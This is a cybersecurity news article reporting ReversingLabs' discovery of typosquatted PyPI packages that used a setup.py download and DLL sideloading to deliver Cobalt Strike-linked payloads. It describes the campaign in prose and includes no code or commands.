ReversingLabs researchers have uncovered Python packages using DLL sideloading to bypass security tools.
On 10 January 2024, Karlo Zanki, a reverse engineer at ReversingLabs, stumbled upon two suspicious packages on the Python Package Index (PyPI). These packages – named NP6HelperHttptest and NP6HelperHttper – were found to be utilising DLL sideloading, a known technique used by malicious actors to execute code discreetly and evade detection from security tools.
This discovery underscores the expanding threat landscape within software supply chains, with malicious actors exploiting vulnerabilities in open-source ecosystems. The incident highlights the challenges developers face in vetting the quality and authenticity of open-source modules, amidst the vast and ever-evolving landscape of available code.
The malicious packages, disguised under names closely resembling legitimate ones, aimed to deceive developers into unwittingly incorporating them into their projects. This tactic, known as typosquatting, is just one of many methods employed by attackers to infiltrate legitimate software supply chains.
Further investigation revealed that the malicious packages targeted existing PyPI packages, NP6HelperHttp and NP6HelperConfig, originally published by a user named NP6. While NP6 is associated with Chapvision, a marketing automation firm, the PyPI account in question was linked to a personal account of a Chapvision developer. The discovery prompted Chapvision to confirm the legitimacy of the helper tools and subsequently remove the malicious packages from PyPI.
The analysis of the malicious packages uncovered a sophisticated approach, wherein a setup.py script was used to download both legitimate and malicious files. Notably, the malicious DLL – dgdeskband64.dll – was crafted to exploit DLL sideloading, a technique commonly employed by cybercriminals to load malicious code while evading detection.
Further examination revealed a wider campaign, with additional samples exhibiting similar characteristics. ReversingLabs’ Titanium Platform, utilising YARA Retro Hunt, identified related samples indicating a coordinated effort by threat actors.
The malicious code – embedded within the DLL – utilised an exception handler to execute shellcode, establishing a connection with an external server to download and execute payloads. The investigation also uncovered traces of Cobalt Strike Beacon, a red team security tool repurposed by threat actors for malicious activities.
This discovery underscores the growing sophistication of malicious actors who leverage open-source infrastructure for their campaigns. It highlights the urgent need for developers and organisations to fortify their software supply chains against such attacks, emphasising proactive measures to ensure the integrity and security of their code repositories.
(Photo by David Clode on Unsplash)
See also: Apple is killing web apps in the EU
Want to learn more about cybersecurity and the cloud from industry leaders? Check out Cyber Security & Cloud Expo taking place in Amsterdam, California, and London. The comprehensive event is co-located with other leading events including BlockX, Digital Transformation Week, IoT Tech Expo, and AI & Big Data Expo.
Additionally, the upcoming Cloud Transformation Conference is a free virtual event for business and technology leaders to explore the evolving landscape of cloud transformation. Book your free virtual ticket to explore the practicalities and opportunities surrounding cloud adoption.
Explore other upcoming enterprise technology events and webinars powered by TechForge here.